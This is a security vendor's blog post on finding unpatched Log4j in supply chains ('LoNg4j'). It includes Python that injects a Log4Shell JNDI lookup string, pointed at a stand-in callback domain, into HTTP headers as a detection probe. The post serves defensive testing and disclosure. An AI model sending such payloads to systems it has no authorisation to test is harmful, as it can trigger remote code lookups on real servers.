Best Practices for Addressing Log4j and LoNg4j Patching Gaps

Long after the press coverage and panic surrounding the discovery of Log4j, the Log4Shell exploit and the supply-chain variant dubbed LoNg4j, IT and security teams are still struggling to adopt Log4j best practices to ensure their servers are patched and protected. To help our customers address this critical need and improve API security, we added a Log4j detection capability to API Spyder. Any inbound DNS request API Spyder received was time-stamped as an added data point. API Spyder was finding Log4j instances for our customers, and they were patching them as quickly as they were found. First 12 were found, then 10, then 8, then 12 again… wait, what? Something was clearly going on.

The fluctuations in the number of Log4j instances found were not a bug – they turned out to be something we called LoNg4j. This new Log4j variant showed that even after a globally known vulnerability has been disclosed and a patch made available, organizations still suffer from a lack of applied patches. Best practices for capturing unpatched Log4j servers and potential LoNg4j instances are to expand the testing radius to include third-party solutions within your digital supply chain and to extend the timeframe for results to as long as 24 hours.

LoNg4j Explained

Demonstrating how interconnected our systems really are, LoNg4j refers to instances of the Log4j vulnerability found upstream in your digital supply chain. One of the API Spyder detection techniques inserts a vulnerability test payload into a header. When the initial tests were done, the transactions were logged and the results came back negative – no Log4j. Then those logs were compiled, processed, or parsed by an additional system that is itself vulnerable, and the resulting callback to API Spyder revealed that Log4j is present after all.
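The header-probe technique described above can be sketched as follows. This is a minimal illustration, not Cequence's actual implementation: the callback domain `oast.example.com`, the header names chosen, and the `make_probe_headers` helper are all assumptions for the example. The idea is that each probe carries a unique token, so if any system along the way logs the header through a vulnerable Log4j, the JNDI lookup triggers a DNS query to a domain the tester controls, and the token ties that query back to the original target.

```python
import uuid

# Hypothetical out-of-band callback domain controlled by the tester
# (an assumption for this sketch, not real infrastructure).
CALLBACK_DOMAIN = "oast.example.com"

def make_probe_headers(target_id: str) -> dict:
    """Build HTTP headers carrying a unique JNDI-style test payload.

    If a vulnerable Log4j instance logs any of these headers, the
    lookup resolves <token>.<CALLBACK_DOMAIN>, producing a DNS
    request the listener can time-stamp and correlate to target_id.
    """
    token = f"{target_id}-{uuid.uuid4().hex[:8]}"
    payload = "${jndi:ldap://" + token + "." + CALLBACK_DOMAIN + "/probe}"
    # Headers that downstream systems commonly log.
    return {
        "User-Agent": payload,
        "X-Api-Version": payload,
        "Referer": payload,
    }

headers = make_probe_headers("acme-web")
print(headers["User-Agent"])
```

Because the token is unique per probe, a DNS callback arriving hours later – after batch log processing somewhere upstream – can still be attributed to the exact test that triggered it, which is precisely how LoNg4j instances surface.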

While the news cycles around Log4j have come and gone, the vulnerability still exists. As I sit here writing this, almost a year later, our team still sees API Spyder light up with detections across our customers and prospects. In some cases, the vulnerability resides in an organization we are not engaged with yet, resulting in a responsible disclosure submission.

Learn more about API Spyder

Initial Responses to Log4j and Log4Shell Discoveries: Denial

When informed that an organization may have a vulnerability, the initial response often comes in the form of “let me see exactly how you did this.” We often get requests that challenge the validity of our claims, so we have processes in place to ensure we aren’t crying wolf. The next response is usually “we have already patched this in all of our systems,” followed by “tell us how you found this.” Digging through the API Spyder data repository, I can pull out the requests and responses to illustrate how the LoNg4j instances were found. In the most recent case, our tests were generating returns from one of the customer’s vendor systems that performs an orchestration function. Denial here might be accurate – your systems aren’t impacted – but your digital supply chain may be.

This pattern of doubt or denial is common when an organization is made aware of a potential vulnerability via a Responsible Disclosure. It’s important to note that if someone tries to inform you that they have found a vulnerability in your app or website, be willing to believe it. A Responsible Disclosure notification is made in the interest of helping. There are further steps many organizations go through on this journey, but that first step of acceptance is the hardest to get past. I am not sure why.

Vulnerability management is very difficult to execute properly. It’s a significant resource drain, requiring massive amounts of coordination to apply even the simplest of patches. The initial patches and deployments are often flawed or must be applied again, and that assumes you know which systems need patching. Then what happens when the patch breaks something else? When you consider the number of servers and resources in a large organization, you can understand why it is so hard. Keep in mind, though, that responding to an attacker who has gotten a shell on one of your servers with a very small script is even harder than vulnerability management. Once an attacker has access, the average time they spend on a system is over 180 days – and that assumes you find them and kick them out.

Staying Ahead of Log4j and LoNg4j

The widespread use of Log4j and the vast library of internal and 3rd-party servers that organizations have deployed mean that the vulnerability will be with us for years to come. Confirming this assertion, in the last six months API Spyder has found over 4,000 instances of Log4j and LoNg4j in the wild. Many of these detections have been in 3rd-party systems or buried deep in our customers’ supply chains. My recommendation to our customers is to remain vigilant, regardless of how successful your patching efforts may appear to be.

  • Understand your exposure: Use API testing and penetration tools to fully understand your public facing threat footprint and what your adversaries see.
  • Expand testing parameters: Include potential 3rd-party and digital supply chain targets in your testing efforts.
  • Exercise patience: Lengthen testing timeframes to as long as 24 hours to accommodate supply chain traversal that incorporates log analysis or event correlation.
  • Track inventory and assess risks: Use visibility gained during initial analysis for continuous inventory tracking, API risk assessment and threat detection.
  • Remediate and mitigate: Patch discovered vulnerabilities quickly and block threats in real time to prevent data loss and business disruption.
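The “exercise patience” recommendation above comes down to correlating callbacks against probes over a long window rather than treating a test as finished after a few minutes. Here is a hedged sketch of that correlation step; the record shapes, the `correlate` function, and the 24-hour window are illustrative assumptions, not API Spyder’s internals.

```python
from datetime import datetime, timedelta

# Callbacks arriving within this window are attributed to a probe.
WINDOW = timedelta(hours=24)

def correlate(probes: dict, callbacks: list) -> list:
    """Match DNS callbacks to the probes that triggered them.

    probes:    token -> time the probe was sent
    callbacks: list of (token, time the DNS callback was seen)

    Returns (token, delay) for each callback whose token matches a
    probe sent within the last 24 hours. A delay of seconds suggests
    direct Log4j exposure; a delay of hours often indicates a LoNg4j
    case, where a downstream log pipeline processed the payload later.
    """
    hits = []
    for token, seen in callbacks:
        sent = probes.get(token)
        if sent is not None and timedelta(0) <= seen - sent <= WINDOW:
            hits.append((token, seen - sent))
    return hits

t0 = datetime(2022, 11, 1, 9, 0)
probes = {"acme-1a2b": t0}
# One callback 6 hours later, plus an unmatched token to ignore.
callbacks = [("acme-1a2b", t0 + timedelta(hours=6)), ("unknown", t0)]
for token, delay in correlate(probes, callbacks):
    print(token, delay)
```

The 6-hour delay in the example is the telltale LoNg4j signature: the target itself tested clean, but a batch log-processing system upstream evaluated the payload much later.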

Log4j, LoNg4j and Log4Shell will not disappear anytime soon, making it imperative that all organizations are aware of the risks and are fully prepared.

Confirm your Log4j and LoNg4j patching efforts are complete with a free API Spyder assessment.


*** This is a Security Bloggers Network syndicated blog from Cequence Security authored by Jason Kent. Read the original post at: